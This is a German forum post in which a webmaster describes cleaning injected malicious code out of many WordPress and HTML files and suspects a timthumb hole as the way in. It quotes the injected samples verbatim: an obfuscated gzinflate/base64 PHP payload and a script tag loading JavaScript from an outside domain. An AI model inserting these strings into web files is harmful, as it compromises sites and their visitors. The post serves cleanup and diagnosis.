Ja groß was eingefangen!!!
Ging mir leider genauso... ich habe heute schätzungsweise 7-9h damit gebracht elendig viel Schadcode aus zugegebenermaßen recht vielen Seiten zu entfernen.
Was es ist? Weiß ich leider auch noch nicht... habe erstmal alles entfernt bevor ich mit der Recherche anfange... daher bin ich jetzt hier gelandet.
Aber das Script ist sicher nicht das Einzige!
Es handelt sich ja um Wordpress... bitte mal an folgenden Orten prüfen:
WP_root/index.php
WP_root/wp-header.php
WP_root/wp-login.php
(und eine neue php Datei dürfte hier auch drin liegen. Name Variiert (session.php, q.php, p.php, phdinfo.php,favicon.php...) aber Änderungsdatum nur einige Sekunden neben den anderen hier genannten)
WP_root/wp-admin/admin-footer.php
WP_root/wp-admin/admin-header.php
WP_root/wp-admin/custom-header.php
WP_root/wp-admin/index.php
WP_root/wp-admin/menu-header.php
WP_root/network/wp-admin/index.php
WP_root/wp-content/index.php
WP_root/wp-content/plugins/index.php
(gegebenenfalls auch einige Pluginordner betroffen, jeweils die index Dateien)
WP_root/wp-content/themes/index.php
WP_root/wp-content/themes/THEMEORDNER/index.php
WP_root/wp-content/themes/THEMEORDNER/page.php
WP_root/wp-content/themes/THEMEORDNER/header.php
WP_root/wp-content/themes/THEMEORDNER/footer.php
WP_root/wp-includes/theme-compat/header.php
WP_root/wp-includes/theme-compat/footer.php
so das sind jetzt alles Standarddateien der WP-Installationen. Je nach Plugins und Themes kann da noch mehr da zu kommen. Alle diese Dateien dürften ein Datum der letzten Änderung von gestern oder heute Nacht haben nehme ich an... jedenfalls liegt die Änderungszeit nur Sekunden auseinander.
Und in alle Dateien wurde feinsäuberlich ein Schadcode eingeschrieben:
#b58b6f#
echo(gzinflate(base64_decode("JctRCoAgDADQq8gO4P5DvcuwRUmhbKPl7fvw98FLWuUaFmwOzmD8GTZ6aSkElZrhNBsborvHnab2Y3aRWPuDwjeTcmwKJeFK5Qc=")));
#/b58b6f#
(vielleicht variiert da auch der Inhalt)
ja und je nach dem was noch so auf dem Server liegt sind wahrscheinlich alle Ordner betroffen. Also in jedem Falle mehrere Wordpressinstallationen aber ggf auch alle anderen php und html Dateien (meist irgendwas mit header, index, etc im Namen) In HTML Dateien wird übrigens direkt:
<!--b58b6f--><script type="text/javascript" src="http://www.daysofyorr.com/release.js"></script><!--/b58b6f-->
hineingeschrieben.
So was das ganze macht?! Keine Ahnung, sicher nichts gutes s. Trojanerwarnung. Dsa Löschen der Codes ist sicher auch nicht das Ende vom Lied (ich Sitze auf meinem Webspace schon recht lange mit solchen Problemen... das kommt immer mal wieder in anderer Form)
Vermutung: Das ganze hat sein Einfallstor in der thumb.php oder timthumb.php ich würde also stark vermuten, dass zumindest einer der Blogs auf dem Server ein Theme nutzt, welches timthumb integriert hat. Ihr könnt das ja bitte bestätigen oder widerlegen... die Ursache wüsste ich nämlich auch gern. Habe sie selbst noch nicht gefunden...